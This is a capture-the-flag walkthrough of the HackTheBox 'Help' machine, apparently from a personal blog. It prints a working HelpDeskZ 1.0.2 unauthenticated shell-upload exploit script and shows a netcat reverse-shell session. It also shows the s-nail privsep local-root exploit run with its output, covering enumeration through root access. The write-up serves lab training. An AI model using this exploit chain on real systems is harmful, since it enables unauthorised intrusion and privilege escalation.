[HackTheBox] Help


I started off with a quick Nmap scan on the target.

nmap -sSV -T4

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-22 11:20 AEST
Nmap scan report for
Host is up (0.23s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that there is an Apache Service running on port 80. Port 3000 was slightly more interesting.

I began my enumeration by performing a quick directory enumeration on the service running at port 80.

root@kali:~/Desktop/HackTheBox/Help# gobuster -w /usr/share/wordlists/dirb/common.txt -u

Gobuster v2.0.1              OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
2019/05/22 11:43:36 Starting gobuster
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/support (Status: 301)
2019/05/22 11:45:38 Finished

Gobuster was able to discover “support” which redirected me to the HelpDeskZ application.


A quick google search on this application revealed this vulnerability which allows Arbitrary Shell Upload that can then be chained with a reverse shell. The exploit from the link above is missing a few characters (like colons). This has been fixed and can be seen below:


import hashlib
import time
import sys
import requests
import datetime

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

r = requests.get(helpdeskzBaseUrl)

currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970,1,1)).total_seconds())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        print url + ":404"

print "Sorry, I did not find anything"

Following the instructions, I navigated to the following link to upload my shell.

I entered random data into the form and selected my shell (named baegmon.php) for the attachment upload. Upon submitting my form, I was shown an error that the file I uploaded is not allowed; however, this is actually not true and the warning can be ignored.

Before executing the exploit, there is one “gotcha”. The exploit requires you to specify the directory in which tickets are uploaded to. By digging through line 138 in submit_ticket_controller.php and line 18 in global.php we can piece together the ticket upload directory.

Line 138: $uploaddir = UPLOAD_DIR.'tickets/';
Line 018: define('UPLOAD_DIR', ROOTPATH . 'uploads/');

Result: http://host/support/uploads/tickets/

With the file uploaded, I ran the exploit and waited until it was able to successfully create my shell.

== Screen 1 ==
root@kali:~/Desktop/HackTheBox/Help# python exploit.py baegmon.php 
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
== Screen 2 ==
root@kali:~/Desktop/HackTheBox/Help# nc -nvlp 8989
listening on [any] 8989 ...
connect to [] from (UNKNOWN) [] 37994
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 09:16:49 up 14 min,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off

With shell access on the system, I quickly used Python to upgrade my current shell into a basic bash shell and obtained the user flag.

$ python -c 'import pty; pty.spawn("/bin/bash")'
help@help:/home$ cd /home/help && cat user.txt
cd /home/help && cat user.txt

Privilege Escalation

I started off with some quick enumeration on the system. I started by looking for SUID/GUID binaries on the system and was able to discover an interesting binary.

help@help:/home/help$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

I was also running enumeration scripts in the background. Linux Exploit Suggester was able to find the following:

help@help:/tmp$ ./les.sh 

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

71 kernel space exploits
39 user space exploits

Possible Exploits:


[+] [CVE-2017-5899] s-nail-privget

   Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
   Tags: [ ubuntu=16.04 ],manjaro=16.10
   Rank: 3
   Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
   ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
   Comments: Distros use own versioning scheme. Manual verification needed.


The exploit makes use of a directory traversal vulnerability in the setuid root helper binary in S-nail to gain root privileges. Armed with this knowledge, I obtained the exploit and uploaded it to the system and triggered it.

help@help:/tmp$ ./exploit.sh 
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
[.] Compiling /var/tmp/.sh.c ...
[.] Compiling /var/tmp/.privget.c ...
[.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
[=] s-nail-privsep local root by @wapiflapi
[.] Started flood in /etc/ld.so.preload
[.] Started race with /usr/lib/s-nail/s-nail-privsep
[.] This could take a while...
[.] Race #1 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
  It is capable of gaining more privileges than "s-nail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.

-- snip --

[.] Race #306 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
  It is capable of gaining more privileges than "s-nail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.
[.] Race #307 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 6336 May 21 20:45 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# whoami

With root privileges obtained, the only thing left was to obtain the flag!

# cat /root/root.txt

Leave a Comment